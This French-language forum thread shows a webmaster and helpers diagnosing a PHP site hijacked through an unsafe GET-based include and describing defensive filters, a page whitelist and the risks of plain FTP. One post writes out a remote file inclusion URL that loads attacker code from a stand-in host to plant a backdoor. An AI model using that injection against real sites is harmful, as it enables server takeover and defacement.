Et avant de tout mettre sur le dos de l'include, penses à changer ton mot de passe FTP. S'ils l'ont, le reste ne sert à rien...
Je dirais même, changer de logiciel de FTP, analyser voir formater tous les postes qui se connectent au FTP.
Bonjour!
je ne me connecte au FTP que depuis un ordinateur, le mien.
J'ai appelé OVH et ils m'ont dit que c'était toujours le même poste qui s'était connecté dans les 6 derniers mois... C'est eux qui m'ont dit que ça devait venir de mon include...
Je sais pas...
Il suffit que tu consultes les logs de connexion et tu sauras si un paramètre suspect a été passé à ta page par l'url.
Pour le FTP, on peut imaginer que ton logiciel soit infecté.
Après avoir eu l'accès ssh au site, j'ai rajouté ce code au début de la page qui inclus :
code supprimé pour plus de discrétion
- ouverture des urls distantes interdite
- l'inclusion ne doit pas contenir ni http, ni ftp, ni un '\' ou un '/'
- l'inclusion doit se terminer par html ou htm
- le fichier doit exister au même niveau du système de fichier.
J'ai également positionné les globales à "off" : elle étaient en marche et le $contenu n'était pas récupéré par GET.
Petit plus : le log des tentatives d'injections est aussi consultable.
Ca devrait tenir un peu plus, l'idéal étant de lister les pages autorisées, mais y a un peu de boulot à faire... Ils ont bien travaillé et y a beaucoup de pages.
Et si ça ne tient pas, gageons que le hacker n'y arrivera pas du mpremier coup et que ses tentatives seront logguées, donc analysables.
Putain!
c'est de la tuerie! Alors la, de ce que j'en comprend, ça parait sur sécurisé! Si on ne peut plus appeler de pages extérieures, plus appeler de page autres que html... ca parait carré!
Pour répondre à sabotage et xunil, comme je l'ai dit de nombreuses fois je ne m'y conais pas bien, mais si il n'y a que mon ordinateur qui se connecte, et que toutes les pages sont statiques (html), il ne peut pas y avoir d'autre failles si?
Seulement, en effet, si j'ai un virus sur mon ordi qui commandite tout le bordel...
Ce qui me fait penser que ça vient de l'include, c'est qu'avant ça recommencait toutes les 24h en moyenne, avec le code de snafu, c'est resté normal 5-6 jours...
Sinon le piratage affiche une page noire, avec marqué gite double l en blanc(c le nom de notre site), et après ça fait comme un faux moteur de recherche genre: 'you want to know more about gite double l ? try this links!
Gite double l: free porn video
gite double l: by a house easily!
gite double l...
Voila, c'est très embêtant...
Donc snafu, maintenant je recopie ton code pour la version anglaise et l'autre site?
Bon, c'est fait pour l'autre site.
Par contre, ce qui est un peu con, c'est que si on tape gitedoublel sur google, ce post arrive en deuxième position, la protection est donc plus ou moins publique...
Hello,
Bon, pour le log de 19h40, c'est moi ... j'ai testé la réponse.
Bonjour les Amis,
Désolé d'arriver sur une discution résolue , pour y apporter mon grain de sel,
mais je voulais préciser quelques points que j'ais compris ici:
Au départ je crois il n'existe aucune faille de FTP, surtout sur un bon serveur, qui aurait eu le code FTP et comment
Alors le coupable ?
Bien sur le trou énorme du GET, qui est donc résolu si j'ais bien compris
Mais c 'est quoi ces fichiers PHP et d' ou vient' il ?
Tout bétement que lorsqu'un serveur éxécute un PHP situé SUR le serveur, celui-ci a tout les droits
du reste quand on voit comment PHPBB s'installe, crées des répertoires en change les protections, généres toutes les pages Mysql etc...
Alors c' est simple il me faut mettre au moins un PHP SUR le serveur de gitedoublel
Mais voyons il y était déjas ce PHP !!
mapageprincipale.php
puisque tout include dans un PHP ne fait qu'augmenter sa taille et son nombre d'instructions, mais son nom est le même et ses droit aussi bien sur
Alors je fais
et dans pirate.txt j'écris le code de génération sur le serveur de mon PHP a moi qui m servira de porte d'entrée a tout ce que je veux !
Code : Sélectionner tout - Visualiser dans une fenêtre à part mapageprincipale.php?contenu=http://www.xxx.com/pirate.txt
J'allais dire de ce fait que vos derniers codes sont inutiles,
Par contre si vous tenez vraiment au GET alors appliquez la régle de s.n.a.f.u ou Sabotage mettez un simple code
genre
avec dans le php un array avec les noms des pages a inclure en fonction de la valeur reçue !
Code : Sélectionner tout - Visualiser dans une fenêtre à part mapageprincipale.php?contenu=18
FoxLeRenard: As-tu deja entendu parler des attaque par le milieu ?
D'apres guideinformatique.com il s'agit d'une "Attaque menée par un hacker qui se place entre deux ordinateurs en communication et se fait passer pour l’un deux afin d'obtenir le mot de passe de l'autre. Dès lors, il peut se retourner vers le premier avec un mot de passe valide et l'attaquer réellement."
Comme en protocole ftp comme http, les mdp sont transmis sans encryption et que tu n'as pas de fingerprint, crois moi une connection ftp est un serieux troux de securite. C'est pour ca que les boites qui se soucies un peu de la securite utilisent sftp ou ssh pour connecter a leur serveur.
L'essai d'explication du 9tailed est un bon début, je rajoute de la biblio :
http://www.developpez.net/forums/d19...lus-courantes/
http://php.developpez.com/faq/?page=securite
http://php.developpez.com/faq/?page=...ire-faille-xss
Au passage, j'ai interdit la balise script dans la sécurité du site...
Oui l'Ami je connais bien, et nous avons donné il y a peut de temps (un mois ?) un shemat de ce mécanisme.
http://fr.wikipedia.org/wiki/Attaque...omme_du_milieu
http://www.lesnouvelles.net/articles...sms-contournee
Mais tu sais bien que ces techniques c'est du haut de gamme tu t'en doute, alors je n'ais même pas imaginé une seconde que pour le petit web du coin un hackeur de ce niveau mette en place un systéme si complexe
oui c'est claire, mais dans le cas d'un hebergeur mutualise, c'est un bon deal a mettre en place parce qu'avec une pierre tu fais plusieurs millier de coups.
hahahahaha, non non je suis incapable de mettre un truc comme ca en place comme tu l'as faut des hackers de haut niveau et je ne suis meme pas un dev de niveau moyen. C'est juste qu'il y a quelques temps au taff on a appris a nos depend que l'utilisation de ftp, c'est pas secure du tout loin de la meme.
Vous avez un bloqueur de publicités installé.
Le Club Developpez.com n'affiche que des publicités IT, discrètes et non intrusives.
Afin que nous puissions continuer à vous fournir gratuitement du contenu de qualité, merci de nous soutenir en désactivant votre bloqueur de publicités sur Developpez.com.
Partager